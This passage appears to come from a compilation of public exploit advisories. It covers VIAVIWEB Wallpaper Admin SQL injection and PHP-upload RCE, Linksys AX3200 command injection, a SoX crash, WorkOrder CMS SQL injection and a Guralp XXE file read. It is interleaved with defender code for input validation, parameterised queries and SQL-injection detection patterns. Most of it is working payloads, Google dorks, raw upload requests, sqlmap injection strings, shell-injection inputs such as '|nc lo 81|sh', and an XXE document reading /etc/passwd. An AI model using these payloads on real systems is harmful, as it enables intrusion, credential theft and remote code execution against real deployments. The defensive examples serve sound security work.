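def check_with_constructed_dns(url):
    return check_remote_file_url(url, resolver=constructed_resolver)


if __name__ == "__main__":
    for candidate in ("http://localhost:8081", "http://images.example.com/frame.png"):
        print(candidate, "->", check_with_constructed_dns(candidate))
```

Two caveats belong with this check. The fetch itself must connect to one of the addresses that were validated (pin the resolved address or re-check inside the HTTP client), otherwise a name that resolves differently on the second lookup defeats it; and redirects returned by the remote server must be re-validated with the same function before being followed.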
# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
# Date: [18/09/2022]
# Exploit Author: [Edd13Mora]
# Vendor Homepage: [www.viaviweb.com]
# Version: [N/A]
# Tested on: [Windows 11 - Kali Linux]
------------------
SQLI on the Login page
------------------
payload --> admin' or 1=1-- -
---
POC:
---
[1] Disable JavaScript in your browser, enter the payload and submit
[2] Re-enable JavaScript and resend the request
---------------------------
Authenticated SQL Injection:
---------------------------
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
-----------------------------------------------
Remote Code Execution (RCE, unauthenticated):
-----------------------------------------------
Poc:
----
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
--------------------
Burp Request :
--------------------
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"
1
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"
-----------------------------33893919268150571572221367848--
Uploaded File can be found here :
--------------------------------
http://localhost/PAth-Where-Script-Installed/categories/
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows
# Proof Of Concept:
1 - Log in to the AX3200 web UI
2 - Go to the Diagnostics page
3 - Enter "google.com|ls" as the traceroute target
4 - The file listing is returned; "example.com|id" confirms that every command runs as the root user
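Both this advisory and the SmartRG one above are the same defect: a diagnostics page takes a host name, concatenates it into a shell command (`traceroute`, `ping`) and runs it, so `|` in the value appends a second command. The example below is added here and is not code from either vendor: it validates the target as an IP literal or a DNS hostname before use, and then runs the tool as an argument vector rather than a shell string, so a metacharacter that somehow passed validation would still be handed to `traceroute` as a single, harmless argument. The `-m 30` hop limit and the `runner` parameter (injectable so the test does not execute anything) are choices of this example.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing hyphen, 253 chars total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def validate_target(target):
    """Return the target if it is an IP literal or a syntactically valid hostname; raise otherwise."""
    t = target.strip()
    try:
        ipaddress.ip_address(t)
        return t
    except ValueError:
        pass
    if HOSTNAME_RE.match(t):
        return t
    raise ValueError("rejected traceroute target: %r" % target)


def is_acceptable_target(target):
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_traceroute_argv(target):
    """argv list, never a shell string: the host is one argument even if validation were bypassed."""
    return ["traceroute", "-m", "30", validate_target(target)]


def run_traceroute(target, runner=subprocess.run):
    argv = build_traceroute_argv(target)
    # shell=False is the default for a list argv; nothing here is parsed by /bin/sh
    return runner(argv, capture_output=True, text=True, timeout=60)


if __name__ == "__main__":
    for candidate in ("example.com", "192.168.1.1", "google.com|ls", "|nc lo 81|sh"):
        print("%-16s acceptable=%s" % (candidate, is_acceptable_target(candidate)))
```

The two layers are deliberately independent: the allowlist regex rejects the payloads shown on this page, and the argv form means a future gap in the regex does not become command execution.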
# Exploit Title: SoX 14.4.2 - Denial Of Service
# Exploit Author: LiquidWorm
Vendor: Chris Bagwell
Product web page: http://sox.sourceforge.net
https://en.wikipedia.org/wiki/SoX
Affected version: <=14.4.2
Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing
tools: it can convert sound files between many different file formats and
audio devices, and can apply many sound effects and transformations, as well
as doing basic analysis and providing input to more capable analysis and
plotting tools.
Desc: SoX suffers from a division by zero attack when handling WAV files,
resulting in denial of service vulnerability and possibly loss of data.
Tested on: Ubuntu 18.04.6 LTS
Microsoft Windows 10 Home
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5712
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php
CWE ID: 369
CWE URL: https://cwe.mitre.org/data/definitions/369.html
05.09.2022
--
PoC:
https://zeroscience.mk/codes/sox_div0.wav.zip
---
$ ./sox div0.wav test.wav reverse
Floating point exception (core dumped)
...
Program received signal SIGFPE, Arithmetic exception.
0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
(gdb) bt
#0 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950
#1 0x000055555558dcc2 in open_read (path=<optimized out>, buffer=<optimized out>, buffer_size=<optimized out>, signal=0x5555559a5140, encoding=<optimized out>, filetype=0x555555777621 "wav")
at formats.c:545
#2 0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945
...
Program received signal SIGFPE, Arithmetic exception.
0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
1457 blocksWritten = MS_UNSPEC/wBlockAlign;
(gdb) bt
#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
#1 startwrite (ft=0x5555559a6a90) at wav.c:1252
#2 0x0000555555591669 in open_write (path=<optimized out>, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0,
signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>) at formats.c:912
#3 0x0000555555593913 in sox_open_write (path=<optimized out>, signal=<optimized out>, encoding=<optimized out>, filetype=<optimized out>, oob=<optimized out>, overwrite_permitted=<optimized out>)
at formats.c:948
#4 0x000055555556b620 in open_output_file () at sox.c:1557
#5 process () at sox.c:1754
#6 main (argc=<optimized out>, argv=<optimized out>) at sox.c:3008
(gdb) bt full
#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457
wFormatTag = 1
dwAvgBytesPerSec = 0
dwFactSize = 4
bytespersample = <optimized out>
blocksWritten = <error reading variable blocksWritten (Division by zero)>
dwSamplesWritten = 0
...
# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux
# Auth Bypass:
username:' or '1'='1
password:' or '1'='1
#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql
# POST Requests:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM (SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/
Parameter: #2* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/
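Defender-side note, added here and not part of the advisory or of WorkOrder CMS: the bypass value above only works because the login query is built by string concatenation. The Python below (SQLite in memory; the table layout and credential are constructed for the demo, and the concatenated query is an assumed reconstruction of the pattern since the WorkOrder CMS source is not on the page) shows the bypass against the concatenated query, the same input failing against a parameterised one, and a small request-body tripwire for the payload shapes sqlmap reported.

```python
"""Added example (not WorkOrder CMS code): why the bypass value above works against a
concatenated login query and not against a parameterised one, plus a request-body
tripwire. SQLite in memory; table layout and credential are constructed for the demo
(a real application compares a password hash, never a stored plaintext)."""
import re
import sqlite3
from urllib.parse import unquote_plus

TAUTOLOGY = "' or '1'='1"  # the auth-bypass value reported in the advisory


def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "demo-only-secret"))
    return conn


def build_concat_query(username: str, password: str) -> str:
    """Vulnerable pattern (assumed; the WorkOrder CMS source is not on the page):
    untrusted input spliced straight into the SQL text."""
    return ("SELECT userName FROM users WHERE userName='" + username
            + "' AND password='" + password + "'")


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # With TAUTOLOGY in both fields the WHERE clause becomes
    #   userName='' or '1'='1' AND password='' or '1'='1'
    # whose trailing OR is always true, so a row comes back without credentials.
    return conn.execute(build_concat_query(username, password)).fetchone() is not None


def login_param(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: placeholders bind the input as data, so quotes in it cannot
    change the statement's structure."""
    row = conn.execute(
        "SELECT userName FROM users WHERE userName=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


# Detection tripwire for the payload shapes sqlmap reported above (tautology,
# SLEEP-based timing, FLOOR(RAND()) error extraction, INFORMATION_SCHEMA probes).
SQLI_SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s*'1'\s*=\s*'1", re.I),
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "schema-probe": re.compile(r"information_schema\.", re.I),
}


def flag_login_body(body: str) -> list:
    """Names of signatures matched by a raw form body (after URL decoding)."""
    decoded = unquote_plus(body)
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]


def run_demo() -> dict:
    conn = make_demo_db()
    return {
        "concat_bypassed": login_concat(conn, TAUTOLOGY, TAUTOLOGY),
        "param_bypassed": login_param(conn, TAUTOLOGY, TAUTOLOGY),
        "param_valid_login": login_param(conn, "admin", "demo-only-secret"),
        "flags": flag_login_body("userName=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271"),
    }


if __name__ == "__main__":
    print(run_demo())
```

The tripwire is for logging and alerting only; signature matching is evadable through encoding and comment tricks, so the fix is the parameterised query, with the signatures as a secondary signal that someone is probing the login form.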
# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: http://guralp.com/
# Version: 3.2.4
# Authentication Required: NO
# CVE : CVE-2022-38840
# Google dork: " webconfig menu.cgi "
# Tested on: Windows
# Exploit
1 - browse to http://<Host name>/cgi-bin/xmlstatus.cgi
2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form
3 - you will get /etc/passwd file content
#XML exploit code
```
<?xml version='1.0'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>
<xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'>
<module status='-1' display-primary='true' path='das' title='Data acquisition'>
<reading status='100' display-primary='false' path='is_faulty'
title='Fault condition'>false</reading>
<reading status='-1' display-primary='false' path='dsp_tag'
title='DSP code tag'>platinum</reading>
<reading status='-1' display-primary='false' path='dsp_version'
title='DSP code version'>102</reading>
<reading status='100' display-primary='true' path='dsp_state'
title='Acquisition hardware module'>running</reading>
<reading status='-1' display-primary='true' path='reference_clock'
title='Reference clock type'>GPS</reading>
<reading status='100' display-primary='false' path='clock_controller'
title='ADC clock controller state'>FLL</reading>
<reading status='-1' display-primary='false' path='clock_control_val'
title='ADC clock controller value'>46196</reading>
<reading status='100' display-primary='true' path='clock_locked'
title='ADC clock locked'>true</reading>
<reading status='-1' display-primary='true' path='clock_last_locked'
title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='clock_phase_error' units='s'
title='ADC clock phase error'>6.1e-08</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
<reading status='96' display-primary='true' path='mass_Z'
title='Z mass position'>4.6%</reading>
<reading status='100' display-primary='true' path='mass_N'
title='N mass position'>-0.3%</reading>
<reading status='100' display-primary='true' path='mass_E'
title='E mass position'>-0.3%</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'>
<reading status='100' display-primary='true' path='total_blocks'
title='Total number of blocks sent'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks'
title='Number of blocks sent in last 5 minutes'>331</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1567</reading>
<reading status='-1' display-primary='true' path='num_clients'
title='Number of clients connected'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'>
<reading status='100' display-primary='true' path='num_channels'
title='Number of channels'>16</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of connected clients'>5</reading>
<reading status='100' display-primary='true' path='num_samples'
title='Number of samples received'>7338920142</reading>
<reading status='100' display-primary='true' path='last5_samples'
title='Number of samples in last 5 minutes'>213600</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
<list-item status='-1' display-primary='false' path='44B02216' title='Client #1'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2gcf[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi-link-tx[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2miniseed[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in</reading>
</list-item>
<list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in-textstatus</reading>
</list-item>
</list>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHE.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HDF.TM.X0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNZ.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNN.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNE.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MME.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-AIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.1</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-BIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.X</reading>
</list-item>
<list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-XIB</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'>
<reading status='100' display-primary='true' path='total_bytes_sent' units='bytes'
title='Total number of bytes sent'>11273973132</reading>
<reading status='100' display-primary='true' path='last5_bytes_sent'
title='Number of bytes sent in last 5 minutes'>325518</reading>
<reading status='100' display-primary='true' path='tx_rate'
title='Transmit rate over last 5 minutes'>1085.06</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1565</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of samples in'>7439096490</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in in last 5 minutes'>216516</reading>
<reading status='100' display-primary='true' path='num_blocks_out'
title='Total number of blocks out'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks_out'
title='Number of blocks out in last 5 minutes'>331</reading>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XX0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM8</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM9</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AMA</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-A00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-B00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
